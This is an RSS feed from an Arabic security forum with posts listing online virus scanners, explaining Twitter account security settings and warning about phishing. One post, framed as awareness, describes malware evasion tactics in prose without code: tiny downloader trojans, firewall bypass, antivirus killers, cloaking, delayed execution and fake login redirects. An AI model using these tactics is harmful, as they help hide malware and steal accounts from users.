<?xml version="1.0" encoding="windows-1256"?>

<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/">
	<channel>
		<title>منتدى الشبكة الكويتية - منتدى الحماية و الهاكرز</title>
		<link>https://kwety.net/vb/</link>
		<description>كل ما يخص برامج الأمن والحماية من الفيروسات والإختراقات</description>
		<language>ar</language>
		<lastBuildDate>Sat, 18 Apr 2026 04:04:45 GMT</lastBuildDate>
		<generator>vBulletin</generator>
		<ttl>60</ttl>
		<image>
			<url>https://kwety.net/vb/5star/misc/rss.jpg</url>
			<title>منتدى الشبكة الكويتية - منتدى الحماية و الهاكرز</title>
			<link>https://kwety.net/vb/</link>
		</image>
		<item>
			<title>أقوى مواقع فحص الملفات الملغومه</title>
			<link>https://kwety.net/vb/showthread.php?t=35525&amp;goto=newpost</link>
			<pubDate>Sat, 15 Nov 2025 14:34:31 GMT</pubDate>
			<description><![CDATA[ بسم الله الرحمن الرحيم
الصلاة و السلام على أشرف المرسليـن ...
الحمد لله وحده نحمده و نشكره و نستعينه و نستغفره و نعود بالله من شرور أنفسنا و من سيئات أعمالنا ...
...من يهده الله فلا مظل له و من يظلل فلن تجد له ولياً مرشدا ...
...و أشهد ألا إلاه إلا الله وحده لا شريك له و أن محمداً عبده و رسوله صلى الله عليه و سلم ...
... و على آله و صحبه أجمعين و من تبعهم بإحسان إلى يوم الدين ...
...ربنا لا علم لنا إلا ما علمتنا إنك أنت العليم الخبير ...
...ربنا لا فهم لنا إلا ما فهمتنا إنك أنت الجواد الكريم ...
...ربي اشرح لي صدري و يسر لي أمري و احلل عقدة من لساني يفقهوا قولي ...
...أما بعد ...
...فإن أصدق الحديث كتاب الله تعالى و خير الهدي هديُ سيدنا محمد صلى الله عليه و سلم ...
...و شر الأمور محدثاتها و كل محدثة بدعة و كل بدعة ضلالة و كل ضلالة في النار ...
... فاللهم أجرنا و قنا عذابها برحمتك يا أرحم الراحمين...



هذه اهم مواقع كشف التلغيم والفايروسات الموجودة بملف مشكوك فيه

المواقع تفحص على اشهر برامج الحماية واقواها


ملاحظة : المواقع تنفعنا فقط في فحص الملفات ذات الحجم الصغير ففي حالات كثيرة نحتاج الى فحص الملف باكثر من طريقة خصوصا في الملفات الكبيرة الحجم .


اليكـــم المواقع:


PHP:
----------
ThreatExpert
https://www.threatexpert.com/filescan.aspx

---------------------------------------------------------------

VirusTotal
https://www.virustotal.com/

---------------------------------------------------------------

VirSCAN.org
https://www.virscan.org/

---------------------------------------------------------------

Anubis
Anubis - Malware Analysis for Unknown Binaries

---------------------------------------------------------------
Jotti's Malware Scan
https://virusscan.jotti.org/fr


---------------------------------------------------------------

Symantec Security Check
https://security.symantec.com

---------------------------------------------------------------
Microsoft Malware
https://www.microsoft.com/security/portal/submit.aspx

---------------------------------------------------------------


Avast
https://onlinescan.avast.com/

---------------------------------------------------------------


Kaspersky en ligne virus scanner
Kaspersky Security Scan | Free Virus Scan Download | Kaspersky Lab

---------------------------------------------------------------

McAfee FreeScan
Antivirus Software and Internet Security For Your PC or Mac | McAfee

---------------------------------------------------------------

Panda ActiceScan 2.0
FREE ANTIVIRUS online: ActiveScan 2.0 - PANDA SECURITY

---------------------------------------------------------------

BitDefender Scanner
Free Online Virus Scan - Bitdefender Online Virus Scanner

---------------------------------------------------------------

Eset Analyse
ESET Free Online Scanner :: Complete Malware Detection :: ESET


---------------------------------------------------------------

Kaspersky Virus Scanner
Kaspersky Security Scan | Free Virus Scan Download | Kaspersky Lab

---------------------------------------------------------------


VirusChief
https://www.viruschief.com
----------
بالتوفيق]]></description>
			<content:encoded><![CDATA[<div><div align="center"><font color="Sienna"> بسم الله الرحمن الرحيم</font></div><font color="DarkSlateGray">الصلاة و السلام على أشرف المرسليـن ...<br />
الحمد لله وحده نحمده و نشكره و نستعينه و نستغفره و نعود بالله من شرور أنفسنا و من سيئات أعمالنا ...<br />
...من يهده الله فلا مظل له و من يظلل فلن تجد له ولياً مرشدا ...<br />
...و أشهد ألا إلاه إلا الله وحده لا شريك له و أن محمداً عبده و رسوله صلى الله عليه و سلم ...<br />
... و على آله و صحبه أجمعين و من تبعهم بإحسان إلى يوم الدين ...<br />
...ربنا لا علم لنا إلا ما علمتنا إنك أنت العليم الخبير ...<br />
...ربنا لا فهم لنا إلا ما فهمتنا إنك أنت الجواد الكريم ...<br />
...ربي اشرح لي صدري و يسر لي أمري و احلل عقدة من لساني يفقهوا قولي ...<br />
...أما بعد ...<br />
...فإن أصدق الحديث كتاب الله تعالى و خير الهدي هديُ سيدنا محمد صلى الله عليه و سلم ...<br />
...و شر الأمور محدثاتها و كل محدثة بدعة و كل بدعة ضلالة و كل ضلالة في النار ...<br />
... فاللهم أجرنا و قنا عذابها برحمتك يا أرحم الراحمين...<br />
<br />
<br />
<br />
هذه اهم مواقع كشف التلغيم والفايروسات الموجودة بملف مشكوك فيه<br />
<br />
المواقع تفحص على اشهر برامج الحماية واقواها<br />
<br />
<br />
ملاحظة : المواقع تنفعنا فقط في فحص الملفات ذات الحجم الصغير ففي حالات كثيرة نحتاج الى فحص الملف باكثر من طريقة خصوصا في الملفات الكبيرة الحجم .</font><br />
<br />
<br />
<font color="Red">اليكـــم المواقع:</font><br />
<br />
<div style="margin:20px; margin-top:5px">
	<div class="smallfont" style="margin-bottom:2px">كود PHP:</div>
	<div class="alt2">
		<hr />
		<code style="white-space:nowrap">
		<div dir="ltr" style="text-align:left;">
			<!-- php buffer start --><code><span style="color: #000000">
<span style="color: #0000BB">ThreatExpert<br />https</span><span style="color: #007700">:</span><span style="color: #FF8000">//www.threatexpert.com/filescan.aspx<br /><br /></span><span style="color: #007700">---------------------------------------------------------------<br /><br /></span><span style="color: #0000BB">VirusTotal<br />https</span><span style="color: #007700">:</span><span style="color: #FF8000">//www.virustotal.com/<br /><br /></span><span style="color: #007700">---------------------------------------------------------------<br /><br /></span><span style="color: #0000BB">VirSCAN</span><span style="color: #007700">.</span><span style="color: #0000BB">org<br />https</span><span style="color: #007700">:</span><span style="color: #FF8000">//www.virscan.org/<br /><br /></span><span style="color: #007700">---------------------------------------------------------------<br /><br /></span><span style="color: #0000BB">Anubis<br />Anubis&nbsp;</span><span style="color: #007700">-&nbsp;</span><span style="color: #0000BB">Malware&nbsp;Analysis&nbsp;</span><span style="color: #007700">for&nbsp;</span><span style="color: #0000BB">Unknown&nbsp;Binaries<br /><br /></span><span style="color: #007700">---------------------------------------------------------------<br /></span><span style="color: #0000BB">Jotti</span><span style="color: #DD0000">'s&nbsp;Malware&nbsp;Scan<br />https://virusscan.jotti.org/fr<br /><br /><br />---------------------------------------------------------------<br /><br />Symantec&nbsp;Security&nbsp;Check<br />https://security.symantec.com<br /><br />---------------------------------------------------------------<br />Microsoft&nbsp;Malware<br />https://www.microsoft.com/security/portal/submit.aspx<br /><br />---------------------------------------------------------------<br /><br /><br />Avast<br />https://onlinescan.avast.com/<br /><br />---------------------------------------------------------------<br /><br /><br />Kaspersky&nbsp;en&nbsp;ligne&nbsp;virus&nbsp;scanner<br />Kaspersky&nbsp;Security&nbsp;Scan&nbsp;|&nbsp;Free&nbsp;Virus&nbsp;Scan&nbsp;Download&nbsp;|&nbsp;Kaspersky&nbsp;Lab<br /><br />---------------------------------------------------------------<br /><br />McAfee&nbsp;FreeScan<br />Antivirus&nbsp;Software&nbsp;and&nbsp;Internet&nbsp;Security&nbsp;For&nbsp;Your&nbsp;PC&nbsp;or&nbsp;Mac&nbsp;|&nbsp;McAfee<br /><br />---------------------------------------------------------------<br /><br />Panda&nbsp;ActiceScan&nbsp;2.0<br />FREE&nbsp;ANTIVIRUS&nbsp;online:&nbsp;ActiveScan&nbsp;2.0&nbsp;-&nbsp;PANDA&nbsp;SECURITY<br /><br />---------------------------------------------------------------<br /><br />BitDefender&nbsp;Scanner<br />Free&nbsp;Online&nbsp;Virus&nbsp;Scan&nbsp;-&nbsp;Bitdefender&nbsp;Online&nbsp;Virus&nbsp;Scanner<br /><br />---------------------------------------------------------------<br /><br />Eset&nbsp;Analyse<br />ESET&nbsp;Free&nbsp;Online&nbsp;Scanner&nbsp;::&nbsp;Complete&nbsp;Malware&nbsp;Detection&nbsp;::&nbsp;ESET<br /><br /><br />---------------------------------------------------------------<br /><br />Kaspersky&nbsp;Virus&nbsp;Scanner<br />Kaspersky&nbsp;Security&nbsp;Scan&nbsp;|&nbsp;Free&nbsp;Virus&nbsp;Scan&nbsp;Download&nbsp;|&nbsp;Kaspersky&nbsp;Lab<br /><br />---------------------------------------------------------------<br /><br /><br />VirusChief<br />https://www.viruschief.com&nbsp;<br /></span>
</span>
</code><!-- php buffer end -->
		</div>
		</code>
		<hr />
	</div>
</div><font color="DarkSlateGray">بالتوفيق</font></div>

]]></content:encoded>
			<category domain="https://kwety.net/vb/forumdisplay.php?f=61">منتدى الحماية و الهاكرز</category>
			<dc:creator>DWASS</dc:creator>
			<guid isPermaLink="true">https://kwety.net/vb/showthread.php?t=35525</guid>
		</item>
		<item>
			<title>تأمين حساب تويتر وحمايته من السرقة</title>
			<link>https://kwety.net/vb/showthread.php?t=34721&amp;goto=newpost</link>
			<pubDate>Tue, 11 Oct 2016 15:40:43 GMT</pubDate>
			<description><![CDATA[صورة: http://www.kwety.net/up/do.php?img=110  (http://www.kwety.net/up/)

حماية حساب تويتر ؟ و كيف أحافظ على خصوصية معلومات حسابي ؟
اذهب إلى موقع تويتر أو التطبيق افتح صفحتك ، اذهب إلى أقصى اليسار تحديدا صورتك الشخصية اضغط عليها ستنسدل إمامك قائمة قصيرة بها مفك التعريفي ، اللحظات ، اختصارات لوحة المفاتيح ، القوائم التي أنت ضمنها أو تمت إضافتك إليها اختر منها الإعدادت .

صورة: http://www.kwety.net/up/do.php?img=111  (http://www.kwety.net/up/)

يتميز موقع توتير ب سهولة اعداد أو تعيين الإعدادات والخصوصية والأمان فيه ، كل ما عليك أن تختر شيئا من القائمة المطولة ليظهر لك في مقابله ما تريد بضغطة واحدة تختر الخاصية أو تلغيها لديك ..
بالحديث حول الامان والحماية يجب عليك أن تراجع ما يلي :
• الحساب
• التنبيهات
• الخط الزمني
• المحتوى والخصوصية
• الموقع
• إمكانية الوصول
سنقوم هنا بشرح كل نقطة مما شبق على حدا بتفصيل وشرح وافي مع الصور التوضيحية

صورة: http://www.kwety.net/up/do.php?img=112  (http://www.kwety.net/up/)

الحساب :
يتيح لك بالإضافة لتغيير رقم الهاتف وتأكيده و تغيير البريد الإلكتروني او تحديثه ميزة الامن التي من خلالها يتم توثيق كل عملية تسجيل دخول من خلال هذا الحساب تستطيع ايضا من قائمة الحساب تغيير كلمة المرور لزيادة الامان في حسابك وحمايته من الاختراق بكتابة كلمة مرور قوية.
يساعدك تويتر من خلال ميزة توثيق تسجيل الدخول على التحقق من طلبات تسجيل الدخول ويحفظها لديه وأي طلب تسجيل الدخول من مكان آخر سيصلك اشعارا بذلك يخبرك عنه وهل تعرفت عليه أم لا ! سيساعد هذا في عملية حماية الحساب وأيضا استرجاعه في حال تم اختراقه أو سرقته.
وذلك على الشكل الآتي بعد تسجيل الدخول للموقع ، ستصلك رسالة نصية قصيرة على الهاتف مع رمز ستحتاجه للدخول إلى حسابك . يطلب منك بعد إدخال كلمة المرور الصحيحة إدخاله في مكان مخصص لذلك .

صورة: http://www.kwety.net/up/do.php?img=113  (http://www.kwety.net/up/)

اعدادات الحساب على تويتر – توثيق تسجيل الدخول -تأمين حساب تويتر
عند تغيير البريد الالكتروني من خلال قائمة اعدادات الحساب ستجد امكانية اعدادات الخصوصية التي من خلالها تستطيع التحكم في امكانية عثور الاخرين عليك من خلال رقم هاتفك المحمول او من خلال البريد الالكتروني في حال ترغب بان يجدوك من خلال البريد الالكتروني او رقم الجوال قم بوضع علامة الصح في الصندوق او المكان المخصص.
تغيير البريد الالكتروني من خلال اعدادات الحساب على تويتر – خيارات الخصوصية.

صورة: http://www.kwety.net/up/do.php?img=114  (http://www.kwety.net/up/)

تغيير كلمة المرور لتامين حساب تويتر>>>

صورة: http://www.kwety.net/up/do.php?img=115  (http://www.kwety.net/up/)

شرح اعدادات الخصوصية لحساب تويتر ؟

صورة: http://www.kwety.net/up/do.php?img=116  (http://www.kwety.net/up/)

خاصية تحديد الموقع الجغرافي على تويتر – اعدادات الامان على تويتر

صورة: http://www.kwety.net/up/do.php?img=117  (http://www.kwety.net/up/)

اشكر الجميع للمتابعه وتحياتي لكم وبالتوفيق]]></description>
			<content:encoded><![CDATA[<div><a href="http://www.kwety.net/up/" target="_blank"><img src="http://www.kwety.net/up/do.php?img=110" border="0" alt="" /></a><br />
<br />
<font color="Sienna">حماية حساب تويتر ؟ و كيف أحافظ على خصوصية معلومات حسابي ؟</font><br />
<font color="SeaGreen">اذهب إلى موقع تويتر أو التطبيق افتح صفحتك ، اذهب إلى أقصى اليسار تحديدا صورتك الشخصية اضغط عليها ستنسدل إمامك قائمة قصيرة بها مفك التعريفي ، اللحظات ، اختصارات لوحة المفاتيح ، القوائم التي أنت ضمنها أو تمت إضافتك إليها اختر منها الإعدادت .</font><br />
<br />
<a href="http://www.kwety.net/up/" target="_blank"><img src="http://www.kwety.net/up/do.php?img=111" border="0" alt="" /></a><br />
<br />
<font color="SeaGreen">يتميز موقع توتير ب سهولة اعداد أو تعيين الإعدادات والخصوصية والأمان فيه ، كل ما عليك أن تختر شيئا من القائمة المطولة ليظهر لك في مقابله ما تريد بضغطة واحدة تختر الخاصية أو تلغيها لديك .</font>.<br />
<font color="Sienna">بالحديث حول الامان والحماية يجب عليك أن تراجع ما يلي :</font><br />
<font color="Red">• الحساب<br />
• التنبيهات<br />
• الخط الزمني<br />
• المحتوى والخصوصية<br />
• الموقع<br />
• إمكانية الوصول</font><br />
<font color="SeaGreen">سنقوم هنا بشرح كل نقطة مما شبق على حدا بتفصيل وشرح وافي مع الصور التوضيحية</font><br />
<br />
<a href="http://www.kwety.net/up/" target="_blank"><img src="http://www.kwety.net/up/do.php?img=112" border="0" alt="" /></a><br />
<br />
<font color="Red">الحساب :</font><br />
<font color="Green">يتيح لك بالإضافة لتغيير رقم الهاتف وتأكيده و تغيير البريد الإلكتروني او تحديثه ميزة الامن التي من خلالها يتم توثيق كل عملية تسجيل دخول من خلال هذا الحساب تستطيع ايضا من قائمة الحساب تغيير كلمة المرور لزيادة الامان في حسابك وحمايته من الاختراق بكتابة كلمة مرور قوية.<br />
يساعدك تويتر من خلال ميزة توثيق تسجيل الدخول على التحقق من طلبات تسجيل الدخول ويحفظها لديه وأي طلب تسجيل الدخول من مكان آخر سيصلك اشعارا بذلك يخبرك عنه وهل تعرفت عليه أم لا ! سيساعد هذا في عملية حماية الحساب وأيضا استرجاعه في حال تم اختراقه أو سرقته.<br />
وذلك على الشكل الآتي بعد تسجيل الدخول للموقع ، ستصلك رسالة نصية قصيرة على الهاتف مع رمز ستحتاجه للدخول إلى حسابك . يطلب منك بعد إدخال كلمة المرور الصحيحة إدخاله في مكان مخصص لذلك .</font><br />
<br />
<a href="http://www.kwety.net/up/" target="_blank"><img src="http://www.kwety.net/up/do.php?img=113" border="0" alt="" /></a><br />
<br />
<font color="Green">اعدادات الحساب على تويتر – توثيق تسجيل الدخول -تأمين حساب تويتر<br />
عند تغيير البريد الالكتروني من خلال قائمة اعدادات الحساب ستجد امكانية اعدادات الخصوصية التي من خلالها تستطيع التحكم في امكانية عثور الاخرين عليك من خلال رقم هاتفك المحمول او من خلال البريد الالكتروني في حال ترغب بان يجدوك من خلال البريد الالكتروني او رقم الجوال قم بوضع علامة الصح في الصندوق او المكان المخصص.<br />
تغيير البريد الالكتروني من خلال اعدادات الحساب على تويتر – خيارات الخصوصية.</font><br />
<br />
<a href="http://www.kwety.net/up/" target="_blank"><img src="http://www.kwety.net/up/do.php?img=114" border="0" alt="" /></a><br />
<br />
<font color="Red">تغيير كلمة المرور لتامين حساب تويتر&gt;&gt;&gt;</font><br />
<br />
<a href="http://www.kwety.net/up/" target="_blank"><img src="http://www.kwety.net/up/do.php?img=115" border="0" alt="" /></a><br />
<br />
<font color="Red">شرح اعدادات الخصوصية لحساب تويتر ؟</font><br />
<br />
<a href="http://www.kwety.net/up/" target="_blank"><img src="http://www.kwety.net/up/do.php?img=116" border="0" alt="" /></a><br />
<br />
<font color="Red">خاصية تحديد الموقع الجغرافي على تويتر – اعدادات الامان على تويتر</font><br />
<br />
<a href="http://www.kwety.net/up/" target="_blank"><img src="http://www.kwety.net/up/do.php?img=117" border="0" alt="" /></a><br />
<br />
<font color="Sienna">اشكر الجميع للمتابعه وتحياتي لكم وبالتوفيق</font></div>

]]></content:encoded>
			<category domain="https://kwety.net/vb/forumdisplay.php?f=61">منتدى الحماية و الهاكرز</category>
			<dc:creator>VIP</dc:creator>
			<guid isPermaLink="true">https://kwety.net/vb/showthread.php?t=34721</guid>
		</item>
		<item>
			<title>::::: تحذيررر هاام سرقة الإيميلات بطريقة جديدة :::::</title>
			<link>https://kwety.net/vb/showthread.php?t=32877&amp;goto=newpost</link>
			<pubDate>Mon, 20 Nov 2006 01:37:08 GMT</pubDate>
			<description>السلام عليكم ورحمة الله وبركاته

اخواني شفت حركة انتشرت بين الناس في سرقة البريد غير الطريقة الأولى

حيث ان الطريقة الأولى كان يتم إرسال رابط على بريد الضحية وعندما يضغط على الرابط

ترسل للشخص الذي ارسل لك الرابط جميع بيانات الكوكيز الخاصة بنفس الصفحة التي قمت انت بالفتح عن طريقها

الطريقة الثانية والجديدة هي

تم تصميم صفحات وهمية ترسل للضحايا عن طريق الشات او البريد الإلكتروني

وهي مصممة بتصمم إحترافي غير مشكوك به ومكتووب بها ...

تستطيع تحويل اللغة الغريبة التي ببريدك إلى اللغة العربية لكي تتمكن من قراءة رسائلك بسهولة

فالحذر الحذر لا احد يفتح او يحط باسوورده في اي صفحة او اي رابط يجيه على إيميله

شركة الهوت ميل إلى الآن لم تحل مشكلة اللغة الغريبة 

حبيت ابلغكم بالتحذير يا اخواني حتى ما تنسرق إيميلاتكم</description>
			<content:encoded><![CDATA[<div>السلام عليكم ورحمة الله وبركاته<br />
<br />
اخواني شفت حركة انتشرت بين الناس في سرقة البريد غير الطريقة الأولى<br />
<br />
حيث ان الطريقة الأولى كان يتم إرسال رابط على بريد الضحية وعندما يضغط على الرابط<br />
<br />
ترسل للشخص الذي ارسل لك الرابط جميع بيانات الكوكيز الخاصة بنفس الصفحة التي قمت انت بالفتح عن طريقها<br />
<br />
<font color="Red">الطريقة الثانية والجديدة هي</font><br />
<br />
تم تصميم صفحات وهمية ترسل للضحايا عن طريق الشات او البريد الإلكتروني<br />
<br />
وهي مصممة بتصمم إحترافي غير مشكوك به ومكتووب بها ...<br />
<br />
تستطيع تحويل اللغة الغريبة التي ببريدك إلى اللغة العربية لكي تتمكن من قراءة رسائلك بسهولة<br />
<br />
فالحذر الحذر لا احد يفتح او يحط باسوورده في اي صفحة او اي رابط يجيه على إيميله<br />
<br />
شركة الهوت ميل إلى الآن لم تحل مشكلة اللغة الغريبة <br />
<br />
حبيت ابلغكم بالتحذير يا اخواني حتى ما تنسرق إيميلاتكم</div>

]]></content:encoded>
			<category domain="https://kwety.net/vb/forumdisplay.php?f=61">منتدى الحماية و الهاكرز</category>
			<dc:creator>VIP</dc:creator>
			<guid isPermaLink="true">https://kwety.net/vb/showthread.php?t=32877</guid>
		</item>
		<item>
			<title>الهاكرز وطريقة الاختراق</title>
			<link>https://kwety.net/vb/showthread.php?t=32528&amp;goto=newpost</link>
			<pubDate>Mon, 13 Nov 2006 07:56:02 GMT</pubDate>
			<description>ان دراسة اساليب الاختراق والالمام بخدع المخترق
هي احد الطرق الاكيدة والفعالة والمباشرة للحماية من الاختراق
وتساوي فى اهميتها تركيب اعظم برامج الحماية

فلم تعد الطرق التقليدية والتى عرفها المخترق فى الماضي
تشبع كثيرا رغبتة وطموحه لتحقيق اهدافه المعلنة وغير المعلنة،
فقد لاحقته وسائل الاعلام بالاساليب المختلفة لتوعيةالمستخدم
والتحذير من الوقوع فى براثنه وحيله كما طورت برامج الحماية
بكافة اشكالها لوقف مكايد ودحر خطط المخترق 
ولكن لم يقف المخترق مكتوف الايدي فهناك صراع متزامن
دائما بين الخير والشر فقام المخترق بتطوير وسائله
من الخداع والمراوغة لاصطياد فريسته



نبدا فى استعراض بعضا من تلك الوسائل 
اولا
Trojany

لم يقتنع الهاكرز كثيرا بارسال تروجان للضحية 
بحجم 200- 400 - 600 - .. ك بايت اذ يتوقع المستخدم
من هذا الحجم برنامج قابل للتنفيذ وليس رسالة خطا تدفعه للشك
كذلك فى حالة ربط التروجان مع احد البرامج الحميدة 
فبعد التنفيذ سيختفي التروجان الاصلي ويظل الملف الحميد
melt server after execution
ولذلك يلزم ان يكون فرق الحجم ضئيل جدا بين حجم الملف الحميد
وبين الملف النهائي بحيث لايزيد الفرق عن 3- 4 ك بايت
فى اسوأ الحالات لتفادي شك المستخدم
لذ اعتبر ان الحجم هو احد التحديات
فطور الهاكرز نوعين من البرامح والتقنيات 



النوع الاول
برامج يطلق عليها الداون لدورز web downloaders
تقوم بتكوين تروجان لايزيد حجمه عن 1- 4 ك بايت
وهو ماسيرسل للمستخدم وبمجرد تشغيله يقوم بتحميل
التروجان الاصلي ذو الحجم الاكبر والمرفوع مسبقا 
الى موقع الهاكرز مباشرة الى جهاز الضحية
بل وتنفيذه دون تدخل الهاكرز وتحقيق الاصابة



النوع الثاني
برامج يطلق عليها uploaders 
تلك البرامج ايضا تقوم بتكوين سيرفر صغير الحجم
يتراوح بين 8 - 16 ك و بمجرد ان يقوم المستخدم
بتشغيله يمتلك المخترق بورت مفتوح يمكن من خلاله تحميل
التروجان الكبير، وتكمن خطورة تلك البرامج انها تتحكم فى كافة
العمليات النشطة بنظام التشغيل windows and tasks processes






ثانيا
FWB - FireWall Bypasser
اختراق الجدران النارية

تعتبر تلك التقنية بحق من اخطر ماتوصل اليه المخترق فباحد
اكواد لغة الديلفي البسيطة يندمج التروجان مع تعريف
الويندوز اكسبلورر وبالتالي يحدث الاتصال بين الهاكرز والتروجان
تحت مسمع ومراي وترحيب الجدران الناري بل
وبدون اي استئذان او صلاحية باعتباره صديق عزيز للمستخدم
تعيب تلك التقنية زيادة حجم التروجان بمقدار 20 ك ولكنها 
فى النهاية تقنية تعادل خطورة بالغة 



ثالثا
late trojan execution
التنفيذ الموقوت للتروجان

احد الخدع الحديثة هي برمجة التروجان على التنفيذ فى
توقيت محدد لاحق للتحميل، فعلي سبيل المثال ارسل لك شخص
احد البرامج التى لم يكتشفها الانتي فيروس 
وبعد عدة ساعات او ايام او اشهر وحينما تحين ساعة الصفر
يتم التنفيذ late execution
تتميز تلك الطريقة بامكانية برمجة التروجان للتنفيذ فى اوقات يتوقع
عدم عمل الضحية بها لى الانترنت وبالتالي تزيد نسبة اغلاق برنامج
المراقبة بالانتي فيروس monitoring للحصول على كفاءة
اكبر للعمل بجهاز الكمبيوتر
كما يزيل الشك فى الصديق او الشخص او الموقع
الذي كان السبب الاساسي فى الاصابة



رابعا
AV/FW killers

نظرا لان العديد من المستخدمين يقومون باغلاق خاصية المراقبة
ببرنامج الانتي فيروس اثناء الابحار بالانترنت او خارجه وذلك
لتحسين اداء الجهاز عامة او لان الانتي فيروس يعيق السرعة
ويستهلك الكثير من الذاكرة، فقد استغل المخترق تلك النقطة
وقام بابتكار برامج قاتلة الانتي فيروس والجدران النارية
فعند فتح المستخدم للملف اثناء اغلاق موديول المراقبة
يتم اغلاق كل برامج الحماية قاطبة الى الابد
وبالتالي حتى بعد اعادة التشغيل قد تظهر الايقونة لبرامج الحماية
او لاتظهر، طبقا لتصميم التروجان، ولكنها فى النهاية برامج
حماية مزيفة لاتعمل وبالتاكيد انه لو ترك مويودول المراقبة
بالانتي فيروس فى حالة عمل لتم اصطياد البرنامج كفيروس 
وانتهى الامر






خامسا
cloacking

احد الخصائص الخطيرة فاحد الطرق اليدوية للحماية التى
تعتمد على دراية المستخدم وحرفيته هي مراقبة كل من
task manager
startup
windows processes
registery

ولكن ماذا تفعل لو اخفى التروجان نفسه عن ابراج المراقبة ؟؟
هذا ماحدث بالفعل من خلال تلك الخاصية المضافة حديثا




سادسا
scanning using victims ips

يسعى المخترق بالدرجة الاولى لاخفاء هويته قدر الامكان
عند ارتكاب جرائمه اولا بهدف اخفاء شخصيته عن الضحية
ثانيا بهدف عدم تقفي الاثر من قبل السلطات المختصة حال تعقبه
فاضاف الهاكرز خاصية القيام بعمل مسح للايبيهات
لاصطياد البورتات المفتوحة مستخدما اجهزة الضحايا
فحتى لو قام الجدران الناري بتسليم رقم الاي بي
فسيكون الخاص بضحية مظلوم لايعلم ان جهازه اداة طيعة
فى يد المخترق، بل وحتى لو حاولت السلطات تقفي الاثر
فسيكون الضحية هو الجاني






سابعا
notification trojans

من المؤكد ان احد الطرق التى تعيق عمل المخترق هي
الحصول على الرقم الفعلي للاي بي للضحية فحتى
لواصاب الضحية ولم يصل له الرقم فسيكون فى غيبوبة
عن اختراقه، ولذلك قامت بمهمة محاولة اعاقة وصول رسائل الابلاغ 
للهاكرز مزودات خدمة البريد المجاني ومنها الهوت ميل والياهو
اذ حجبت وصول رسائل العديد من التروجانات الخطيرة
بل وتقوم بصورة دورية بتغيير معرفات سيرفراتها stmp 
بهدف حماية المستخدم 
ولكن كان للمخترق مخرج اخر فقد ابتعد تماما عن البريد فى الابلاغ
واتجه الى احدث تقنيات تصميم المواقع والمفترض استعمالها
فى التطور التكنولوجي وخير البشرية وعلى سبيل المثال لا الحصر
php
cgi scripting
net send messages
irc bot
icq messenger
msn messenger
regular mail on port 25

كما استخدم المخترق طريقة اخرى هي برامج متخصصة
تمكن من الحصول على اي بي من هم بقائمة الميسنجر مع المخترق
غير المحظورين وذلك بدون استقبال ملفات من قبل الضحية
مستخدما احد الثغرات العميقة باالام اس ان ميسنجر فى
اصداره السادس 

واخيرا قدمت بعض الشركات الخدمية للبريد تقرير كامل
للهاكرز عن مستقبل الرسالة شاملا الاي بي الحقيقي 
وتوقيت فتح الرسالة وتاريخها
وكل ماعلى المخترق هو ارسال رسالة بعنوان شيق للضحية
وبمجرد فتح الرسالة البريدية سيتم وصول الاي بي للهاكرز 
وبدون ارسال اي رد من المستخدم او دراية بما يحدث فى الكوليس
وتعتبر الشركات التى تقدم تلك الخدمات، هياكل تجارية كبرى
وليس الهدف منها خدمة المخترقين
ولكن دائما للهاكرز راي اخر فى تطويع التكنولوجيا الحديثة






ثامنا
java scripting

لا شك ان من اخطر الاكواد التي يمكنها تنفيذ اوامر محددة
بجهاز المستخدم من خلال صفحات الويب هي اكواد الجافا
وقد وصل الامر ان احد اكواد الجافا الشهيرة
كانت السبب الرئيسي فى تطوير ميكروسوفت لاصدارها
من الويندوز ميسنجر من الاصدار 4.7 الى الاصدار الخامس
حيث يقوم كود الجافا بمجرد قيامك بفتحة صفحة الويب تتضمنه
بارسال كافة قائمة الاصدقاء الموجودين بميسنجرك
addresses windows messenger lists
وذلك لبريد الهاكرز خلال ثواني معدودة
ولذلك دائما ماينصح بانه فى حالة عدم احتياج صفحات الويب
لدعم الجافا ان يتم عدم تفعيل تلك الخاصية من خيارات الانترنت
بالمتصفح



تاسعا
redirecting

فكثيرا مانفتح احد صفحات الويب ونجد عنوان بالصفحة يعني
انه يتم الان تحويلك الى العنوان الجديد للموقع او اي رسالة مشابهة
وهنا كان للهاكرز راي اخر فتصميم صفحة ويب مزيفة شبيهة بصفحة
التسجيل والدخول لحسابك بالبريد لادخال بياناتك ورقمك السري
بها تظهر لك بمجرد طلبك الصفحة الرئيسية للهوت ميل اوالياهو او ..
وبمجرد ادخال بيانات السليمة فسيتم ارسال كلمةالسر
والبيانات الشخصية الى الهاكرز بينما يتم تحويلك
الى الصفحة الحقيقية للبريد للدخول النظامي
وذالك تحت تحت شعار redirecting






عاشرا
extension creator

مازالت قضية امتداد التروجان احد القضايا التى تشغل بال الهاكرز
فوعي المستخدم كبير والحذر دائم بعدم فتح الملفات
ذات الامتدادات التفيذية واهمها
exe - pif - shs - scr - com - bat
او الاهتمام بضرورة الكشف عليها قبل التشغيل
واخيرا قام الهاكرز بدراسة تصميم برامج تقوم بتوليد اي امتداد تنفيذي 
تعتمد تلك البرامج على فكرة ان نظام التشغيل يقوم بتنفيذ
بعضا من الامتدادات ولايقوم بتنفيذ البعض الاخر 
بناءا على تعريف نظام التشغيل للريجستري بتلك الهيئات
وعليه فان كل ماسيقوم به البرنامج تعريف الريجستري بجهاز الضحية
باي امتداد مطلوب من قبل الهاكرز 
وعليه يمكن ان يحدد الهاكرز ان جهاز الضحية 
يمكنه ان يفتح تروجان على الصيغة التالية server.jpeg 
ويتم التنفيذ والاصابة بعيدا عن ادنى شك من الضحية</description>
			<content:encoded><![CDATA[<div>ان دراسة اساليب الاختراق والالمام بخدع المخترق<br />
هي احد الطرق الاكيدة والفعالة والمباشرة للحماية من الاختراق<br />
وتساوي فى اهميتها تركيب اعظم برامج الحماية<br />
<br />
فلم تعد الطرق التقليدية والتى عرفها المخترق فى الماضي<br />
تشبع كثيرا رغبتة وطموحه لتحقيق اهدافه المعلنة وغير المعلنة،<br />
فقد لاحقته وسائل الاعلام بالاساليب المختلفة لتوعيةالمستخدم<br />
والتحذير من الوقوع فى براثنه وحيله كما طورت برامج الحماية<br />
بكافة اشكالها لوقف مكايد ودحر خطط المخترق <br />
ولكن لم يقف المخترق مكتوف الايدي فهناك صراع متزامن<br />
دائما بين الخير والشر فقام المخترق بتطوير وسائله<br />
من الخداع والمراوغة لاصطياد فريسته<br />
<br />
<br />
<br />
نبدا فى استعراض بعضا من تلك الوسائل <br />
اولا<br />
Trojany<br />
<br />
